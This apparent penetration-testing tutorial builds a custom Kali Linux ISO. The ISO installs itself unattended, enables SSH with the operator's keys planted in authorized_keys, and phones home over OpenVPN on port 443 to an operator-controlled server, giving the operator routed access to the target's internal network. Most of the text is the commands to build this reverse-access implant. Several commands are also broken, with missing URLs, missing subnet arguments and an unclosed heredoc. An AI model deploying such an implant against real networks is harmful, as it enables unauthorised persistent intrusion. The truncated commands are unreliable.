Kali 2.0 Linux ISO of Doom

Setting up the OpenVPN Server

We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build The Kali Linux ISO of Doom on the same machine and make it available for download thorough HTTP

echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
./build-key-server server
./build-key client


cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
cd /etc/openvpn
echo tls-server > server.conf
echo port 443 >> server.conf
echo proto tcp >> server.conf
echo dev tap >> server.conf
echo ca ca.crt >> server.conf
echo cert server.crt >> server.conf
echo key server.key >> server.conf
echo dh dh2048.pem >> server.conf
echo server >> server.conf
echo push “redirect-gateway def1 bypass-dhcp” >> server.conf
echo client-config-dir static >> server.conf
echo keepalive 10 120 >> server.conf
echo comp-lzo >> server.conf
echo user nobody >> server.conf
echo group nogroup >> server.conf
echo persist-key >> server.conf
echo persist-tun >> server.conf
echo status openvpn-status.log >> server.conf
echo verb 3 >> server.conf
# Now we create the client keys. We can have more than one.
mkdir -p static
echo ifconfig-push > static/client
cd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.

Building the Kali Reverse VPN Agent ISO

Now comes the ISO generation. This is where we will build a custom Kali Linux ISO image with the specific set of tools we need for the engagement. The amazing part about this is how simple it is to accomplish compared to any other penetration testing distribution.

apt-get update
apt-get install git live-build cdebootstrap curl -y
git clone git:// build
cd build
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
wget -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
mkdir -p kali-config/common/includes.chroot/root/.ssh/
cp /root/.ssh/ kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget -O ./kali-config/common/includes.installer/preseed.cfg
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
mkdir kali-config/common/includes.chroot/etc
mkdir kali-config/common/includes.chroot/etc/openvpn
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/
cat << EOF > kali-config/common/includes.chroot/etc/openvpn/client.conf
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
verb 3

apt-get remove --purge libdebian-installer4 -y
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
grep -R parser_rfc822 src
apt-get install automake libtool
autoreconf -i -v
make install
cd ~

lb config
lb build
mv binary.hybrid.iso /var/www/
service apache start
cd /etc/openvpn/
openvpn --config /etc/openvpn/server.conf

Now when you boot a system from the iso. The iso will start an unattended install and connects back over vpn after reboot.

Bridging the Network Gaps

Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.

On the server

We enable routing to the remote network on the OpenVPN server:

route add -net gw

On the Kali Agent

We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE

With this complete, our remote target network is now fully accessible to to us. We can any any tools we have to interact with the remote network just as if it was connected as a WAN. All fully automated, and easy to setup. These sorts of customizations to Kali are where the real power lives.

based on